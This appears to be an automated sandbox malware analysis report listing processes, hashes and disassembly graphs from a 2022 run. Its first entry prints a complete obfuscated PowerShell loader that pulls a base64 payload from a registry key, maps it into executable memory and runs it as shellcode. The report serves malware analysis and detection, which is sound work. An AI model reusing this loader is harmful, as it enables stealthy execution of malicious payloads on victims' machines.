              Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelkuITamBlpLdoChrLutBa(An`"""SegAddFriFr3af2Tr`"""No)Ga]GlpFruFobSclIriLecDo UmscatOuaNytCeiStcfo DieTjxbltMoefurkinSc FliBlnSttSi DoPmatKrVFuiImsSuiNobHelSaeAf(PeiBrnSktSt BjSsnaKutAf,PaiCynIntRo ciAPssPspKoafa,LsiSenbatsl JePRerTajSesTiiUnsTg)su;Ny[HuDSalGalTjIOlmSepAropirRetLe(Vi`"""DeuLesAfeSmrFo3Bu2An`"""pa)Sw]SkpAcuDibinlKriNrcBl TasUntBiaPotAniIncCh CoeFrxPltLoeUnrPenTo HyiTunprtMa jaGPreFotBuMSkeSpsNssBeaMagAieTi(PoiinnautSl TyGTuiChrDi,TriLanHotSt AmSSitTorDoaFa,SkibanRetin PrkBeiInpPrkRoaLalBo,AdiAnnAntGe UlFBeiRerNr)So;Kh[InDHolRilRkIGumrepfloGarIstLa(Pa`"""PekEseSkrArnSaeChlMe3An2ti`"""Ji)Ca]SapCeuCabAflReiTocUn PesCltLiaSetOciDacCh KoeAlxUntPreDerNinCi DiiFonPltFl DuVPoiSarFotHeuOgaThlFeAUnlMolSeoDicRe(TrisknSytDo SevNe1Ko,KaiBanBetNi PrvKn2Bi,HeiBanAmtMo InvSt3Bu,CoiMunMitTr Sivti4To)Tr;Bl[MaDinlDelJuISvmMepKboMirRitVi(Gr`"""DiAToDboVToAMaPMiIHa3Hv2Ho.BrDDeLKaLUn`"""Ru)Am]RgpKauTybVilDaiUncCh TosNetUnaMetUniBrcSe SeeNexEntIneDarBinQu AriStnSttOp RaRDoeTrgLiLOvopsaDadOpKHoeFryFr(SiiPhnSatIn syDZaaHocUnrImyBa,FaiUnnaltFo SpSSatHaoUnrPr,TiiHinPutBu NoONanEscfi)He;Po[noDCelHalBlIStmUnpUnoDarArtGi(Ge`"""SpgundSliMo3Sp2Pa`"""Em)Ti]AlpDiuFabTrlLiiChcGe PosKotHoaCetFliStcSe TreLsxRetAceUrrConBa FoiInnMitTr DdWAeiGedKaePrnfiPTjaSttBlhVe(StiHanTutIs TeOGabBydBauTr)St;Ra}Fj'Al;Bj`$DdTPohPawPlaRerFrtFrnvieVisDesSh3Gu=Fr[UdTPshRewKaaOnrSetPjnTreScsWosAr1Ov]Ca:Kn:frVMaiVirSetheuHoaVelStANulArlFooNocSu(So0Nu,Re1Mi0Cl4Ha8Mi5Pr7Ka6Mo,Un1Un2Fr2Br8Ce8Sm,pe6Tr4po)jo;Se`$ReNWiaCreFggLaaAntTaePu=Mi(NoGBleMntBu-ScIPatCieNemAuPDyrFooKupSleKurTrtInyKa Tv-haPBaaExtLohLi Ch'GyHFiKSuCSeUEn:Fr\InTVorMuekaeUotPsiSksIneFu\SkFAneDijStlErtCaoCalHvkBlnPoiPrnNegCheBanovsMu1Ef6Fo0Ka'Ha)Ci.TiHBaeSulViafofSotBoeHonElsSlfMoiKolLomSyeLnnResBr;Ft`$FoVToiJalKrlfeiPagPesRetAreKnsSy Ne=Tv Rl[VoSCyyKnsadtLeeAdmSk.OuCAdoUnnHevnoeFirNotSi]Ov:Ac:RaFMurZeoKmmevBBeaNysMueRe6Un4MoSSltRerStiUnnCogKl(Ga`$StNChaGeePrgAuaLotObeFa)Me;Kv[SoSGryBesMatEmeSmmFe.crRInuGrnLetRiiStmdeeIm.KaIFrnAjtFleOprcroBepPrSGaeGrrSnvIniGncOveHosFa.HaMInaVerGosFrhAnaAllBl]Fr:El:WaCVaoVapCoyir(Un`$HiVTriSilSwlShiSagCosartFreSlsCa,Br ca0Gs,Ru Be Cr`$HeTRehBewBiaWorFltUnnOveUnsHysVa3Ug,By Zy`$BiVSpiSalGrlKoiSvgKrsLitUdeDrsAd.HecMioPouAjnCttHa)Ov;Me[HyTBuhPrwFyausrAntBenMaeMospasHo1In]Je:Sa:HoEtrnBiuPimFrSBrycesditBeeKamUdLAeoDrcKoaGelOpeLesGeWVi(Bo`$feTSahSkwJoaEnrCitPrnPeeSasTossi3Bi,be Kr0De)rh#Te;""";Function Thwartness4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Sallowy = $Sallowy + $HS.Substring($i, 1); } $Sallowy;}$Fictioneer0 = Thwartness4 'UdIReEDiXSk ';$Fictioneer1= Thwartness4 $Saudiarabiske;&$Fictioneer0 $Fictioneer1;;
              Imagebase:0x30000
              File size:430592 bytes
              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high

              General

              Target ID:4
              Start time:17:58:58
              Start date:28/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7fcd70000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:7
              Start time:17:59:56
              Start date:28/11/2022
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline
              Imagebase:0x910000
              File size:2170976 bytes
              MD5 hash:350C52F71BDED7B99668585C15D70EEA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:moderate

              General

              Target ID:8
              Start time:17:59:57
              Start date:28/11/2022
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"
              Imagebase:0x1120000
              File size:43176 bytes
              MD5 hash:C09985AE74F0882F208D75DE27770DFA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:14.8%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:0%
                Total number of Nodes:10
                Total number of Limit Nodes:1
                execution_graph 15681 78179e0 15682 78179f2 15681->15682 15685 7817a78 15682->15685 15683 7817a63 15691 7816ee4 15685->15691 15687 7817a8c 15687->15683 15689 7817b2e SetConsoleCtrlHandler 15690 7817b6a 15689->15690 15690->15683 15692 7817ad8 SetConsoleCtrlHandler 15691->15692 15694 7817a88 15692->15694 15694->15687 15694->15689

                Executed Functions

                Function 07810040 Relevance: 33.2, Strings: 25, Instructions: 1919COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 7810040-7812264 553 7812264 call 78135d8 0->553 554 7812264 call 78135cb 0->554 547 781226a-78122bc 553->547 554->547
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.858668725.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7810000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$D!fk$\ek$\ek$\ek$\ek
                • API String ID: 0-650620818
                • Opcode ID: 4478fcdddc8a5e4c21800cbd03c26492d3362f34152c1357a0ec384485e06879
                • Instruction ID: a0dc4a725fd35f57372320e8c69a0937f3587f1b45e5046b7ab9f6925c9ab1ad
                • Opcode Fuzzy Hash: 4478fcdddc8a5e4c21800cbd03c26492d3362f34152c1357a0ec384485e06879
                • Instruction Fuzzy Hash: 8003E97590012CDFCB65AF60CC54BDA77BAEF85304F5041EA940A6B760EF346EA88F52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 078135CB Relevance: 4.9, Strings: 3, Instructions: 1184COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 555 78135cb-7813625 559 7813627 555->559 560 781362c-78136ca 555->560 559->560 570 78136d0 560->570 571 78137a3-7813ac3 560->571 572 78136d6-7813710 570->572 626 7814021-7814036 571->626 627 7813ac9-7813adb 571->627 811 7813716 call 7815530 572->811 812 7813716 call 78154b8 572->812 813 7813716 call 78154c8 572->813 578 781371c-781379d 578->571 578->572 628 7814165-7814ac2 626->628 629 781403c-7814048 626->629 631 7814ac4 627->631 633 7813ae1-7813b30 627->633 635 7814ac9-7814acf 628->635 629->631 632 781404e-78140a7 629->632 631->635 648 7814150-781415f 632->648 649 78140ad-78140b6 632->649 633->631 650 7813b36-7813b85 633->650 637 7814ad1 635->637 638 7814ad9 635->638 637->638 642 7814ada 638->642 642->642 648->628 648->629 649->631 651 78140bc-781414a 649->651 650->631 661 7813b8b-7813ba1 650->661 651->648 651->649 661->631 663 7813ba7-7813bfa 661->663 663->631 674 7813c00-7813c16 663->674 674->631 675 7813c1c-7813c64 674->675 681 7814012-781401b 675->681 682 7813c6a-7813c80 675->682 681->626 681->627 682->631 685 7813c86-7813c93 682->685 685->631 686 7813c99-7813ceb 685->686 686->631 694 7813cf1-7813cfe 686->694 694->631 696 7813d04-7813d5b 694->696 696->631 703 7813d61-7813d74 696->703 703->631 704 7813d7a-7813dd0 703->704 704->631 712 7813dd6-7813de9 704->712 712->631 714 7813def-7813e42 712->714 714->631 721 7813e48-7813e58 714->721 721->631 722 7813e5e-7813eb7 721->722 722->631 730 7813ebd-7813ecd 722->730 730->631 732 7813ed3-7813f27 730->732 732->631 739 7813f2d-7813f3d 732->739 739->631 740 7813f43-7813f9c 739->740 740->631 748 7813fa2-7813fb8 740->748 748->631 750 7813fbe-781400c 748->750 750->681 750->682 811->578 812->578 813->578
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.858668725.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7810000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: D!fk$D!fk$\ek
                • API String ID: 0-1701413451
                • Opcode ID: e7a6e5a6add212a3063e6670935e1d7cc64216ce6e7552046332015850e72b26
                • Instruction ID: 80de033d2f8a2f660fbac4460dfc715db8eb07acdccfd9e1af341579c03b407d
                • Opcode Fuzzy Hash: e7a6e5a6add212a3063e6670935e1d7cc64216ce6e7552046332015850e72b26
                • Instruction Fuzzy Hash: F0B226F0F40218AFDB68DB64D895BADB7B6EF88300F4485D9A559BB780CB706D808F54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 078135D8 Relevance: 4.9, Strings: 3, Instructions: 1181COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 814 78135d8-7813625 817 7813627 814->817 818 781362c-78136ca 814->818 817->818 828 78136d0 818->828 829 78137a3-7813ac3 818->829 830 78136d6-7813710 828->830 884 7814021-7814036 829->884 885 7813ac9-7813adb 829->885 1069 7813716 call 7815530 830->1069 1070 7813716 call 78154b8 830->1070 1071 7813716 call 78154c8 830->1071 836 781371c-781379d 836->829 836->830 886 7814165-7814ac2 884->886 887 781403c-7814048 884->887 889 7814ac4 885->889 891 7813ae1-7813b30 885->891 893 7814ac9-7814acf 886->893 887->889 890 781404e-78140a7 887->890 889->893 906 7814150-781415f 890->906 907 78140ad-78140b6 890->907 891->889 908 7813b36-7813b85 891->908 895 7814ad1 893->895 896 7814ad9 893->896 895->896 900 7814ada 896->900 900->900 906->886 906->887 907->889 909 78140bc-781414a 907->909 908->889 919 7813b8b-7813ba1 908->919 909->906 909->907 919->889 921 7813ba7-7813bfa 919->921 921->889 932 7813c00-7813c16 921->932 932->889 933 7813c1c-7813c64 932->933 939 7814012-781401b 933->939 940 7813c6a-7813c80 933->940 939->884 939->885 940->889 943 7813c86-7813c93 940->943 943->889 944 7813c99-7813ceb 943->944 944->889 952 7813cf1-7813cfe 944->952 952->889 954 7813d04-7813d5b 952->954 954->889 961 7813d61-7813d74 954->961 961->889 962 7813d7a-7813dd0 961->962 962->889 970 7813dd6-7813de9 962->970 970->889 972 7813def-7813e42 970->972 972->889 979 7813e48-7813e58 972->979 979->889 980 7813e5e-7813eb7 979->980 980->889 988 7813ebd-7813ecd 980->988 988->889 990 7813ed3-7813f27 988->990 990->889 997 7813f2d-7813f3d 990->997 997->889 998 7813f43-7813f9c 997->998 998->889 1006 7813fa2-7813fb8 998->1006 1006->889 1008 7813fbe-781400c 1006->1008 1008->939 1008->940 1069->836 1070->836 1071->836
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.858668725.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7810000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: D!fk$D!fk$\ek
                • API String ID: 0-1701413451
                • Opcode ID: ebc65a9d8c26255bfad91c21307d77071396705016e57c3c359cea81b81f1e8e
                • Instruction ID: 8e012f929fa8d838406dc7419bb3c881a21a915e0b4c6ba9899d069e73840431
                • Opcode Fuzzy Hash: ebc65a9d8c26255bfad91c21307d77071396705016e57c3c359cea81b81f1e8e
                • Instruction Fuzzy Hash: 1FB226F0F40218AFDB68DB64D895BADB7B6EF88300F4485D9A559BB780CB706D808F54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 07817A78 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1219 7817a78-7817a8a call 7816ee4 1222 7817a90-7817b22 1219->1222 1223 7817a8c-7817a8f 1219->1223 1231 7817b24-7817b2c 1222->1231 1232 7817b2e-7817b68 SetConsoleCtrlHandler 1222->1232 1231->1232 1233 7817b71-7817ba5 1232->1233 1234 7817b6a-7817b70 1232->1234 1234->1233
                Memory Dump Source
                • Source File: 00000003.00000002.858668725.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7810000_powershell.jbxd
                Similarity
                • API ID: ConsoleCtrlHandler
                • String ID:
                • API String ID: 1513847179-0
                • Opcode ID: 1a8d43d858c7c46f89407d8e8ea45fc2f6fdb521d50457cef2469a89f4a3f2ed
                • Instruction ID: 626ebd6fa68b2ba4b4d31e9d2cc1309ca7aa0cc2cc588137495c85011c0f34dc
                • Opcode Fuzzy Hash: 1a8d43d858c7c46f89407d8e8ea45fc2f6fdb521d50457cef2469a89f4a3f2ed
                • Instruction Fuzzy Hash: 4B3166B19042498FCB10CFA9C8457EEBBF5AF89310F14846AD459E7781DB38A949CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 07816EE4 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1239 7816ee4-7817b22 1242 7817b24-7817b2c 1239->1242 1243 7817b2e-7817b68 SetConsoleCtrlHandler 1239->1243 1242->1243 1244 7817b71-7817ba5 1243->1244 1245 7817b6a-7817b70 1243->1245 1245->1244
                APIs
                • SetConsoleCtrlHandler.KERNELBASE(00000000,?), ref: 07817B5B
                Memory Dump Source
                • Source File: 00000003.00000002.858668725.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7810000_powershell.jbxd
                Similarity
                • API ID: ConsoleCtrlHandler
                • String ID:
                • API String ID: 1513847179-0
                • Opcode ID: 5182668b44870e277d32fd0a17eb2816423b9379a0467309d5f4bdb6334ab075
                • Instruction ID: 78d491827c318dccbaab566d8a377615ecef742d0716d0f5c8a2c139ab1515bd
                • Opcode Fuzzy Hash: 5182668b44870e277d32fd0a17eb2816423b9379a0467309d5f4bdb6334ab075
                • Instruction Fuzzy Hash: F7214AB69002098FCB10CFAAC8457EEBBF5EB98314F148429D419A7780DB78A945CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02799FD0 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1250 2799fd0-279a010 1252 279a09e-279a0b9 1250->1252 1253 279a016-279a075 1250->1253 1258 279a0bb-279a0c2 1252->1258 1259 279a100-279a107 1252->1259 1264 279a07d-279a07f 1253->1264 1265 279a077 1253->1265 1258->1259 1260 279a10d-279a141 1259->1260 1261 279a247-279a2db 1259->1261 1277 279a21a-279a236 1260->1277 1278 279a147-279a176 1260->1278 1300 279a2e1-279a2ed 1261->1300 1301 279a410-279a423 1261->1301 1266 279a086-279a088 1264->1266 1269 279a079-279a07b 1265->1269 1270 279a081 1265->1270 1266->1259 1271 279a08a-279a09c 1266->1271 1269->1264 1269->1270 1270->1266 1271->1259 1281 279a238 1277->1281 1282 279a244-279a245 1277->1282 1287 279a178-279a1c3 1278->1287 1288 279a1f2-279a203 1278->1288 1281->1282 1282->1261 1291 279a1cb-279a1cd 1287->1291 1292 279a1c5 1287->1292 1290 279a20a-279a214 1288->1290 1290->1277 1290->1278 1296 279a1d4-279a1d6 1291->1296 1293 279a1cf 1292->1293 1294 279a1c7-279a1c9 1292->1294 1293->1296 1294->1291 1294->1293 1296->1290 1298 279a1d8-279a1f0 1296->1298 1298->1290 1304 279a2f3-279a326 1300->1304 1305 279a425 1300->1305 1303 279a42a-279a431 1301->1303 1306 279a43f 1303->1306 1307 279a433 1303->1307 1325 279a32c call 279a539 1304->1325 1326 279a32c call 279a548 1304->1326 1305->1303 1307->1306 1309 279a332-279a35b 1312 279a35d-279a38c 1309->1312 1313 279a38e-279a3ab 1309->1313 1312->1313 1316 279a3ad-279a3b0 1313->1316 1317 279a3b2 1313->1317 1318 279a3b5-279a3c8 1316->1318 1317->1318 1321 279a3fb-279a40a 1318->1321 1322 279a3ca-279a3f9 1318->1322 1321->1300 1321->1301 1322->1321 1325->1309 1326->1309
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 8^jk
                • API String ID: 0-931870485
                • Opcode ID: 66774c1029eaec37fe4d3079bb46c3950d0faceb517b104b3df77442e4077777
                • Instruction ID: 8d4db360bd4ba15165df590fe005e0639b83ce9caa529a3155aa7428a1c2b3be
                • Opcode Fuzzy Hash: 66774c1029eaec37fe4d3079bb46c3950d0faceb517b104b3df77442e4077777
                • Instruction Fuzzy Hash: CCD11C34A01218CFDB24CF68D954BA9BBB2FF89304F1481A9D509AB395DB35DD82CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02796B28 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1327 2796b28-2796b57 1328 2796cba-2796cc1 1327->1328 1329 2796b5d-2796b66 1327->1329 1330 2796b6c-2796bc6 call 2795cb0 call 2795b40 1329->1330 1331 2796cc2-2796cf6 1329->1331 1391 2796bc8 call 2796aa8 1330->1391 1392 2796bc8 call 2796b28 1330->1392 1393 2796bc8 call 2796b1b 1330->1393 1394 2796bc8 call 2796c0b 1330->1394 1395 2796bc8 call 2796e21 1330->1395 1396 2796bc8 call 2796c40 1330->1396 1397 2796bc8 call 2796bd3 1330->1397 1398 2796bc8 call 2796c75 1330->1398 1335 2796cfc-2796d08 1331->1335 1336 2796e46-2796e5d 1331->1336 1338 2796d0e-2796d17 1335->1338 1339 2796e33-2796e3a 1335->1339 1345 2796e64-2796e7b 1336->1345 1342 2796d1d-2796d23 1338->1342 1343 2796e82-2796e8e 1338->1343 1344 2796d29-2796d38 1342->1344 1342->1345 1354 2796e90 1343->1354 1355 2796e92 1343->1355 1348 2796d3a-2796d49 1344->1348 1349 2796d9c-2796dcf 1344->1349 1345->1343 1352 2796d4b-2796d64 1348->1352 1353 2796d6c-2796d94 1348->1353 1372 2796dfa-2796e13 1349->1372 1373 2796dd1-2796de4 1349->1373 1352->1353 1353->1349 1354->1355 1358 2796e94-2796e95 1355->1358 1359 2796e96-2796ebe 1355->1359 1358->1359 1389 2796ec0 call 2796f48 1359->1389 1390 2796ec0 call 2796f38 1359->1390 1364 2796ec6-2796f2f 1366 2796bce-2796cb4 1366->1328 1366->1329 1377 2796e1e 1372->1377 1378 2796e15 1372->1378 1381 2796de7 call 2796aa8 1373->1381 1382 2796de7 call 2796b28 1373->1382 1383 2796de7 call 2796b1b 1373->1383 1384 2796de7 call 2796c0b 1373->1384 1385 2796de7 call 2796e21 1373->1385 1386 2796de7 call 2796c40 1373->1386 1387 2796de7 call 2796bd3 1373->1387 1388 2796de7 call 2796c75 1373->1388 1377->1339 1378->1377 1379 2796ded-2796df8 1379->1372 1379->1373 1381->1379 1382->1379 1383->1379 1384->1379 1385->1379 1386->1379 1387->1379 1388->1379 1389->1364 1390->1364 1391->1366 1392->1366 1393->1366 1394->1366 1395->1366 1396->1366 1397->1366 1398->1366
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: $
                • API String ID: 0-3993045852
                • Opcode ID: 39bb40237d5f19eef80e91eb1482bb88ed8fc0edec93b969243b2942490ae3dc
                • Instruction ID: beef9cb17d7f445982ddd74a88e8ab751b816a40117d3e1afb07fd674efd5aa6
                • Opcode Fuzzy Hash: 39bb40237d5f19eef80e91eb1482bb88ed8fc0edec93b969243b2942490ae3dc
                • Instruction Fuzzy Hash: 6F912774A01209EFCF04DFA9E484AAEBBF6FF88314F148569E915A7350DB34A945CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02796F48 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1399 2796f48-2796f6b 1402 2796f6c-2796f6e 1399->1402 1403 2796f7e-2796fae 1399->1403 1404 2796f7c 1402->1404 1405 2796f70 1402->1405 1411 2796fb0 1403->1411 1412 2796fb2 1403->1412 1404->1403 1463 2796f72 call 2796f48 1405->1463 1464 2796f72 call 2796f38 1405->1464 1407 2796f78-2796f7b 1411->1412 1413 2796fb4 1412->1413 1414 2796fb6-2796fdb 1412->1414 1413->1402 1415 2796fb5 1413->1415 1416 2797139-279715a 1414->1416 1417 2796fe1-2796fef 1414->1417 1415->1414 1427 279715c 1416->1427 1428 279715e-2797180 1416->1428 1420 2796ffb-279701a call 2797791 1417->1420 1421 2796ff1-2796ff8 1417->1421 1425 279701c-2797023 1420->1425 1426 2797026-279705f 1420->1426 1438 27970e1-27970fa 1426->1438 1439 2797065-2797075 1426->1439 1427->1428 1432 27971ec-27971f8 1428->1432 1433 2797182-27971eb 1428->1433 1443 27970fc 1438->1443 1444 2797105 1438->1444 1446 2797083 1439->1446 1447 2797077-2797081 1439->1447 1443->1444 1444->1416 1448 2797088-279708a 1446->1448 1447->1448 1450 279708c-2797092 1448->1450 1451 2797095-27970ae 1448->1451 1450->1451 1461 27970b0 call 27978d0 1451->1461 1462 27970b0 call 27978c0 1451->1462 1456 27970b6-27970c7 1458 27970cd-27970df 1456->1458 1458->1438 1458->1439 1461->1456 1462->1456 1463->1407 1464->1407
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.833577193.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_2790000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: x
                • API String ID: 0-2363233923
                • Opcode ID: 2c594ecd1d8c16657ec74014d725b912109c2b5d8ee06727527f84d6e628a2e8
                • Instruction ID: d0c19cde65eacf255fd4a05a775ecf4db9c531eaec637dca1e4de09d973bf465
                • Opcode Fuzzy Hash: 2c594ecd1d8c16657ec74014d725b912109c2b5d8ee06727527f84d6e628a2e8
                • Instruction Fuzzy Hash: 5C719C75B10208AFCF08DBA9E8586EEBBB6EF89311F10416AE505E7350DF759C06CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02799FC0 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
